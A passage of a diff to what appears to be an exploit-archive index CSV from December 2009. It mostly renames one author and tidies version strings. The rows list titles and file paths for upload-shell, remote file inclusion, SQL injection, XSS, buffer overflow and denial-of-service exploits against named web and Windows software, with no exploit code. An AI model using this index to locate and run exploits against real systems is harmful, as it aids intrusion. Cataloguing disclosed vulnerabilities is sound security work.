Vulnerability",2009-12-26,indoushka,php,webapps,0 +10667,platforms/php/webapps/10667.txt,"paFileDB 3.1 Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10668,platforms/php/webapps/10668.txt,"phpPowerCards 2.0 Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10669,platforms/php/webapps/10669.txt,"Squito Gallery 1.0 - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10670,platforms/php/webapps/10670.txt,"vCard PRO 3.1 Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10671,platforms/php/webapps/10671.txt,"Info Fisier 1.0 Remote File Upload Vulnerability",2009-12-26,"wlhaan hacker",php,webapps,0 -10672,platforms/php/webapps/10672.txt,"kandalf upper 0.1 Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10673,platforms/php/webapps/10673.txt,"DieselScripts jokes Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10674,platforms/php/webapps/10674.txt,"DieselScripts jokes Backup Vulnerability",2009-12-26,indoushka,php,webapps,0 -10675,platforms/php/webapps/10675.txt,"webring Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10677,platforms/php/webapps/10677.txt,"PHPShop Version 0.6 by pass Vulnerability",2009-12-26,"indoushka ",php,webapps,0 -10679,platforms/php/webapps/10679.txt,"quiz Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10680,platforms/php/webapps/10680.txt,"E-Pay RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 -10681,platforms/php/webapps/10681.txt,"Saibal Download Area 2.0 - Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10682,platforms/php/webapps/10682.txt,"Dros RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 -10683,platforms/php/webapps/10683.txt,"TomatoCart Backup Vulnerability",2009-12-26,indoushka,php,webapps,0 -10684,platforms/php/webapps/10684.txt,"Upload-Point 1.6 Beta Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10685,platforms/php/webapps/10685.txt,"Best Top List v2.11 Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10686,platforms/asp/webapps/10686.txt,"CactuShop v6 Database Disclosure Vulnerability",2009-12-26,LionTurk,asp,webapps,0 -10687,platforms/php/webapps/10687.txt,"SaphpLesson 4.0 food RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 -10688,platforms/php/webapps/10688.txt,"FlatPress Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10689,platforms/php/webapps/10689.txt,"file upload Ar Version Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10690,platforms/php/webapps/10690.txt,"IMG2ASCII Cross Site Scripting Vulnerability",2009-12-26,"indoushka ",php,webapps,0 -10691,platforms/php/webapps/10691.txt,"EZPX My photoblog v1.2 Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10692,platforms/php/webapps/10692.txt,"FreeForum 1.7 Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10693,platforms/php/webapps/10693.txt,"FreeForum 1.7 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 -10694,platforms/php/webapps/10694.txt,"ES Simple Uploader v 1.1 Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10695,platforms/php/webapps/10695.txt,"Lizard Cart Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10696,platforms/php/webapps/10696.txt,"epay Backup Vulnerability",2009-12-26,indoushka,php,webapps,0 -10697,platforms/php/webapps/10697.txt,"e-pay 1.55 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 -10698,platforms/php/webapps/10698.txt,"e-cart 3.0 Multiple Vulnerabilities",2009-12-26,indoushka,php,webapps,0 -10699,platforms/php/webapps/10699.txt,"dB Masters Multimedia Insecure Cookie Handling Vulnerability",2009-12-26,indoushka,php,webapps,0 -10700,platforms/php/webapps/10700.txt,"Image File Upload Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10701,platforms/php/webapps/10701.txt,"HowMany V2.6 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 -10703,platforms/php/webapps/10703.txt,"kooora v 3.0 AR Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10704,platforms/php/webapps/10704.txt,"Mega Upload Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10705,platforms/php/webapps/10705.txt,"Gallery v2.3 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 -10706,platforms/php/webapps/10706.txt,"MyCart shopping cart Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10707,platforms/php/webapps/10707.txt,"oscommerce <= 2.2rc2a Bypass/Create and Download Backup Vulnerability",2009-12-26,indoushka,php,webapps,0 -10708,platforms/php/webapps/10708.txt,"MyShoutPro v1.2 Final Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 +10672,platforms/php/webapps/10672.txt,"kandalf upper 0.1 Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10673,platforms/php/webapps/10673.txt,"DieselScripts jokes Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10674,platforms/php/webapps/10674.txt,"DieselScripts jokes Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10675,platforms/php/webapps/10675.txt,"webring Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10677,platforms/php/webapps/10677.txt,"PHPShop Version 0.6 by pass Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10679,platforms/php/webapps/10679.txt,"quiz Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10680,platforms/php/webapps/10680.txt,"E-Pay RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10681,platforms/php/webapps/10681.txt,"Saibal Download Area 2.0 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10682,platforms/php/webapps/10682.txt,"Dros RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10683,platforms/php/webapps/10683.txt,"TomatoCart Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10684,platforms/php/webapps/10684.txt,"Upload-Point 1.6 Beta Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10685,platforms/php/webapps/10685.txt,"Best Top List 2.11 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10686,platforms/asp/webapps/10686.txt,"CactuShop 6.0 - Database Disclosure Vulnerability",2009-12-26,LionTurk,asp,webapps,0 +10687,platforms/php/webapps/10687.txt,"SaphpLesson 4.0 food RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10688,platforms/php/webapps/10688.txt,"FlatPress Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10689,platforms/php/webapps/10689.txt,"file upload Ar Version Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10690,platforms/php/webapps/10690.txt,"IMG2ASCII Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10691,platforms/php/webapps/10691.txt,"EZPX My photoblog 1.2 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10692,platforms/php/webapps/10692.txt,"FreeForum 1.7 Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10693,platforms/php/webapps/10693.txt,"FreeForum 1.7 RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10694,platforms/php/webapps/10694.txt,"ES Simple Uploader v 1.1 Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10695,platforms/php/webapps/10695.txt,"Lizard Cart Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10696,platforms/php/webapps/10696.txt,"epay Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10697,platforms/php/webapps/10697.txt,"e-pay 1.55 RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10698,platforms/php/webapps/10698.txt,"e-cart 3.0 Multiple Vulnerabilities",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10699,platforms/php/webapps/10699.txt,"dB Masters Multimedia Insecure Cookie Handling Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10700,platforms/php/webapps/10700.txt,"Image File Upload Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10701,platforms/php/webapps/10701.txt,"HowMany 2.6 - RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10703,platforms/php/webapps/10703.txt,"kooora v 3.0 AR Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10704,platforms/php/webapps/10704.txt,"Mega Upload Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10705,platforms/php/webapps/10705.txt,"Gallery 2.3 - RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10706,platforms/php/webapps/10706.txt,"MyCart shopping cart Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10707,platforms/php/webapps/10707.txt,"oscommerce <= 2.2rc2a Bypass/Create and Download Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10708,platforms/php/webapps/10708.txt,"MyShoutPro 1.2 Final - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10710,platforms/php/webapps/10710.txt,"Green Desktiny - Customer Support Helpdesk SQL injection vulnerability",2009-12-26,kaMtiEz,php,webapps,0 -10711,platforms/php/webapps/10711.txt,"PHPAUCTION Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10712,platforms/php/webapps/10712.txt,"Nuked-Klan SP4 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 +10711,platforms/php/webapps/10711.txt,"PHPAUCTION Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10712,platforms/php/webapps/10712.txt,"Nuked-Klan SP4 RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10713,platforms/asp/webapps/10713.txt,"Esinti Web Design Gold Defter Database Disclosure Vulnerability",2009-12-26,LionTurk,asp,webapps,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager (OmniInet.exe) Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 (event.php id) SQL Injection",2009-12-26,The_HuliGun,php,webapps,0 -10717,platforms/php/webapps/10717.txt,"DBHCMS - Web Content Management System v1.1.4 RFI Vulnerability",2009-12-26,Gamoscu,php,webapps,0 -10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script Arabic Version Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader v2.0 Upload Shell Vulnerability",2009-12-26,indoushka,php,webapps,0 -10720,platforms/php/webapps/10720.txt,"PHP Football Version : 1.0 Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 -10721,platforms/php/webapps/10721.txt,"Nuked-Klan 1.7.7 RFI Vulnerability",2009-12-26,indoushka,php,webapps,0 -10722,platforms/php/webapps/10722.txt,"PHP Uploader Downloader v2.0 Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 +10717,platforms/php/webapps/10717.txt,"DBHCMS - Web Content Management System 1.1.4 - RFI Vulnerability",2009-12-26,Gamoscu,php,webapps,0 +10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script Arabic Version Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Upload Shell Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10720,platforms/php/webapps/10720.txt,"PHP Football Version : 1.0 Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10721,platforms/php/webapps/10721.txt,"Nuked-Klan 1.7.7 RFI Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10722,platforms/php/webapps/10722.txt,"PHP Uploader Downloader 2.0 - Cross Site Scripting Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 10725,platforms/php/webapps/10725.txt,"Nuke Remote SQL Injection Vulnerability",2009-12-27,FormatXFormaT,php,webapps,0 -10726,platforms/php/webapps/10726.txt,"Info Fisier v1.0 SQL Injection Vulnerability",2009-12-27,"AnGrY BoY",php,webapps,0 +10726,platforms/php/webapps/10726.txt,"Info Fisier 1.0 - SQL Injection Vulnerability",2009-12-27,"AnGrY BoY",php,webapps,0 10727,platforms/php/webapps/10727.txt,"Smart PHP Uploader 1.0 Remote File Upload Vulnerability",2009-12-27,Phenom,php,webapps,0 10728,platforms/php/webapps/10728.txt,"Info Fisier 1.0 multiple Vulnerabilities",2009-12-27,kaozc9,php,webapps,0 10729,platforms/php/webapps/10729.txt,"Joomla Component com_adagency",2009-12-27,Fl0riX,php,webapps,0 10730,platforms/php/webapps/10730.txt,"Joomla Component com_intuit LFI Vulnerability",2009-12-27,Fl0riX,php,webapps,0 10731,platforms/php/webapps/10731.txt,"Joomla Component MemoryBook 1.2 Multiple Vulnerabilities",2009-12-27,jdc,php,webapps,0 -10732,platforms/php/webapps/10732.txt,"PHP upload - (unijimpe) Remote File Upload Vulnerability",2009-12-27,"wlhaan hacker",php,webapps,0 +10732,platforms/php/webapps/10732.txt,"PHP upload - (unijimpe) Remote File Upload Vulnerability",2009-12-27,"wlhaan hacker",php,webapps,0 10733,platforms/php/webapps/10733.txt,"com_webcamxp Cross Site Scripting Vulnerabilities",2009-12-27,Pyske,php,webapps,0 10734,platforms/php/webapps/10734.txt,"Joomla Component com_beeheard Blind SQL injection Vulnerability",2009-12-27,FL0RiX,php,webapps,0 10735,platforms/php/webapps/10735.txt,"com_jm-recommend Cross Site Scripting Vulnerabilities",2009-12-27,Pyske,php,webapps,0 @@ -9955,42 +9955,42 @@ id,file,description,date,author,platform,type,port 10740,platforms/php/webapps/10740.txt,"Joomla Component com_trabalhe_conosco Cross Site Scripting Vulnerabilities",2009-12-27,Pyske,php,webapps,0 10741,platforms/php/webapps/10741.txt,"Cybershade CMS 0.2 Remote File Inclusion Vulnerability",2009-12-27,Mr.SeCreT,php,webapps,0 10742,platforms/php/webapps/10742.txt,"Joomla Component com_dhforum SQL Injection Vulnerability",2009-12-27,ViRuSMaN,php,webapps,0 -10743,platforms/php/webapps/10743.txt,"phPay V2.2a Backup Vulnerability",2009-12-26,indoushka,php,webapps,0 -10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 (seh) Buffer Overflow Exploit (meta)",2009-12-27,dijital1,windows,local,0 +10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup Vulnerability",2009-12-26,"indoushka salah el ddine",php,webapps,0 +10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 (seh) Buffer Overflow Exploit (meta)",2009-12-27,dijital1,windows,local,0 10745,platforms/windows/local/10745.c,"Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit",2009-12-27,mr_me,windows,local,0 10747,platforms/windows/local/10747.py,"Mini-Stream Exploit for Windows XP SP2 and SP3",2009-12-27,dijital1,windows,local,0 10748,platforms/windows/local/10748.rb,"Mini-Stream 3.0.1.1 Buffer Overflow Exploit (Meta)",2009-12-27,dijital1,windows,local,0 10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 SQL injection Vulnerability",2009-12-27,Gamoscu,php,webapps,0 -10751,platforms/php/webapps/10751.txt,"Koobi Pro v6.1 gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0 -10752,platforms/multiple/webapps/10752.txt,"Yonja Remote File Upload Vulnerability",2009-12-28,indoushka,multiple,webapps,80 -10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog version 3.0 Upload shell Vulnerability",2009-12-28,indoushka,multiple,webapps,80 +10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0 +10752,platforms/multiple/webapps/10752.txt,"Yonja Remote File Upload Vulnerability",2009-12-28,"indoushka salah el ddine",multiple,webapps,80 +10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Upload shell Vulnerability",2009-12-28,"indoushka salah el ddine",multiple,webapps,80 10754,platforms/multiple/webapps/10754.txt,"Joomla Component com_if_nexus Remote File Include",2009-12-28,Fl0riX,multiple,webapps,80 10755,platforms/linux/webapps/10755.txt,"egegen turkish script SQL Injection Vulnerability",2009-12-28,FormatXFormaT,linux,webapps,80 -10756,platforms/linux/webapps/10756.txt,"MySimpleFileUploader V1.6 Upload Shell Vulnerability",2009-12-28,FormatXFormaT,linux,webapps,80 +10756,platforms/linux/webapps/10756.txt,"MySimpleFileUploader 1.6 - Upload Shell Vulnerability",2009-12-28,FormatXFormaT,linux,webapps,80 10757,platforms/linux/webapps/10757.txt,"PHP Forum ohne My SQL Remote File Upload Vulnerability",2009-12-28,"wlhaan hacker",linux,webapps,80 10758,platforms/php/webapps/10758.txt,"Calendar Express 2.0 SQL Injection Vulnerability",2009-12-28,Baybora,php,webapps,0 -10759,platforms/windows/local/10759.pl,"M.J.M. Quick Player v1.2 Stack BOF",2009-12-28,corelanc0d3r,windows,local,0 +10759,platforms/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Stack BOF",2009-12-28,corelanc0d3r,windows,local,0 10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario Blind SQL injection Vulnerability",2009-12-28,Mr.tro0oqy,php,webapps,0 10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower SQL Injection Vulneralbility",2009-12-28,"Don Tukulesto",php,webapps,0 10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0 10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 SEH (0day)",2009-12-29,Lincoln,windows,remote,6660 -10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 -10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 -10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection and Path Diclosure Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 -10772,platforms/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 -10773,platforms/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 -10774,platforms/asp/webapps/10774.txt,"htmlArea v2.03 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 -10775,platforms/asp/webapps/10775.txt,"Uguestbook DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 -10776,platforms/asp/webapps/10776.txt,"BaalASP 2.0 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 -10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 -10778,platforms/asp/webapps/10778.txt,"makit news/blog poster v3.1 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 -10779,platforms/php/webapps/10779.txt,"DirectAdmin v1.34.0 XSRF Create Administrator Vulnerability",2009-12-29,SecurityRules,php,webapps,0 -10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0 -10781,platforms/php/webapps/10781.txt,"ActiveKB RFI Vulnerability",2009-12-29,indoushka,php,webapps,0 -10782,platforms/windows/local/10782.pl,"Mini-stream Ripper v3.0.1.1 .pls Universal BOF (Perl)",2009-12-29,Jacky,windows,local,0 -10784,platforms/php/webapps/10784.txt,"eStore v1.0.2 SQL Injection Vulnerability",2009-12-29,R3VAN_BASTARD,php,webapps,0 -10786,platforms/windows/local/10786.py,"Soritong v1.0 Universal BOF (Python)",2009-12-29,Jacky,windows,local,0 -10787,platforms/windows/local/10787.py,"Mini-stream Ripper v3.0.1.1 .pls Universal BOF (Python)",2009-12-29,Jacky,windows,local,0 +10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0 +10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0 +10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection and Path Diclosure Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0 +10772,platforms/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0 +10773,platforms/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0 +10774,platforms/asp/webapps/10774.txt,"htmlArea 2.03 - DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0 +10775,platforms/asp/webapps/10775.txt,"Uguestbook DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0 +10776,platforms/asp/webapps/10776.txt,"BaalASP 2.0 DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0 +10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0 +10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0 +10779,platforms/php/webapps/10779.txt,"DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability",2009-12-29,SecurityRules,php,webapps,0 +10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog DB Download Vulnerability",2009-12-29,"indoushka salah el ddine",asp,webapps,0 +10781,platforms/php/webapps/10781.txt,"ActiveKB RFI Vulnerability",2009-12-29,"indoushka salah el ddine",php,webapps,0 +10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - (.pls) Universal BOF (Perl)",2009-12-29,Jacky,windows,local,0 +10784,platforms/php/webapps/10784.txt,"eStore 1.0.2 - SQL Injection Vulnerability",2009-12-29,R3VAN_BASTARD,php,webapps,0 +10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal BOF (Python)",2009-12-29,Jacky,windows,local,0 +10787,platforms/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - (.pls) Universal BOF (Python)",2009-12-29,Jacky,windows,local,0 10788,platforms/php/webapps/10788.txt,"Helpdesk Pilot Knowledge Base SQL injection vulnerability",2009-12-29,kaMtiEz,php,webapps,0 10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia cross site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0 10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0 @@ -10000,25 +10000,25 @@ id,file,description,date,author,platform,type,port 10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 10796,platforms/asp/webapps/10796.txt,"ezscheduler Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 -10797,platforms/windows/local/10797.py,"Quick Player v1.2 Unicode Buffer Overflow Exploit",2009-12-30,mr_me,windows,local,0 -10798,platforms/php/webapps/10798.txt,"iDevAffiliate v4.0 Backup Vulnerability",2009-12-30,indoushka,php,webapps,0 -10800,platforms/php/webapps/10800.txt,"I-RATER Basic Shell Upload Vulnerability",2009-12-30,indoushka,php,webapps,0 -10802,platforms/php/webapps/10802.txt,"PicMe v2.1.0 Upload Shell Vulnerability",2009-12-30,indoushka,php,webapps,0 -10803,platforms/php/webapps/10803.txt,"UBB.threads v6 RFI Vulnerability",2009-12-30,indoushka,php,webapps,0 -10805,platforms/php/webapps/10805.txt,"Diesel Job Site 1.4 Multiple Vulnerabilities",2009-12-30,indoushka,php,webapps,0 -10806,platforms/php/webapps/10806.txt,"LiveZilla v3.1.8.3 XSS Vulnerability",2009-12-30,MaXe,php,webapps,0 +10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow Exploit",2009-12-30,mr_me,windows,local,0 +10798,platforms/php/webapps/10798.txt,"iDevAffiliate 4.0 - Backup Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 +10800,platforms/php/webapps/10800.txt,"I-RATER Basic Shell Upload Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 +10802,platforms/php/webapps/10802.txt,"PicMe 2.1.0 - Upload Shell Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 +10803,platforms/php/webapps/10803.txt,"UBB Threads 6.0 - RFI Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 +10805,platforms/php/webapps/10805.txt,"Diesel Job Site 1.4 Multiple Vulnerabilities",2009-12-30,"indoushka salah el ddine",php,webapps,0 +10806,platforms/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - XSS Vulnerability",2009-12-30,MaXe,php,webapps,0 10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability",2009-12-30,Palyo34,php,webapps,0 10808,platforms/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio LFI",2009-12-30,bonobug,php,webapps,0 10809,platforms/php/webapps/10809.txt,"I-Escorts Directory (country_escorts.php country_id) SQL Injection Vulnerability",2009-12-30,R3d-D3v!L,php,webapps,0 -10810,platforms/php/webapps/10810.txt,"FlashChat v3.9.3.1 PHP info Vulnerability",2009-12-30,indoushka,php,webapps,0 -10811,platforms/php/webapps/10811.txt,"Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability",2009-12-30,indoushka,php,webapps,0 +10810,platforms/php/webapps/10810.txt,"FlashChat 3.9.3.1 - PHP info Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 +10811,platforms/php/webapps/10811.txt,"Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 10812,platforms/php/webapps/10812.txt,"WHOISCART Scripting Vulnerability",2009-12-30,HAQIQ20,php,webapps,0 -10813,platforms/php/webapps/10813.txt,"ArticleLive PHP Version 2005.0.0 Cross Site Scripting Vulnerability",2009-12-30,indoushka,php,webapps,0 -10816,platforms/php/webapps/10816.txt,"Aptgp.v1.3.0c Cross Site Scripting Vulnerability",2009-12-30,indoushka,php,webapps,0 +10813,platforms/php/webapps/10813.txt,"ArticleLive PHP 2005.0.0 - Cross Site Scripting Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 +10816,platforms/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross Site Scripting Vulnerability",2009-12-30,"indoushka salah el ddine",php,webapps,0 10817,platforms/php/webapps/10817.txt,"Joomla Component com_airmonoblock Blind SQL Injection Vulnerability",2009-12-30,Pyske,php,webapps,0 10819,platforms/asp/webapps/10819.txt,"gallery_show.asp GID suffer from Blind SQL Injection Vulnerability",2009-12-30,R3d-D3v!L,asp,webapps,0 10820,platforms/php/dos/10820.sh,"0day Joomla Core <= 1.5.x com_component DOS",2009-12-31,emgent,php,dos,80 -10821,platforms/multiple/webapps/10821.txt,"WingFTP Server v3.2.4 CSRF Vulnerability",2009-12-30,Ams,multiple,webapps,0 +10821,platforms/multiple/webapps/10821.txt,"WingFTP Server 3.2.4 - CSRF Vulnerability",2009-12-30,Ams,multiple,webapps,0 10822,platforms/php/webapps/10822.txt,"Joomla Component com_rd_download Local File Disclosure Vulnerability",2009-12-30,FL0RiX,php,webapps,0 10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ưlan Servisi Database Disclosure Vulnerability",2009-12-30,LionTurk,asp,webapps,0 10824,platforms/php/webapps/10824.txt,"K-Rate SQL Injection Vulnerability",2009-12-30,e.wiZz,php,webapps,0 @@ -10035,60 +10035,60 @@ id,file,description,date,author,platform,type,port 10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0 10836,platforms/php/webapps/10836.txt,"elkagroup (pid) Remote SQL Injection Vulnerability",2009-12-30,"Hussin X",php,webapps,0 10837,platforms/php/webapps/10837.txt,"Quick Poll (code.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 -10838,platforms/php/webapps/10838.txt,"list Web (addlink.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 +10838,platforms/php/webapps/10838.txt,"list Web (addlink.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip (store_info.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 -10840,platforms/windows/dos/10840.pl,"VLC v1.0.3 Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0 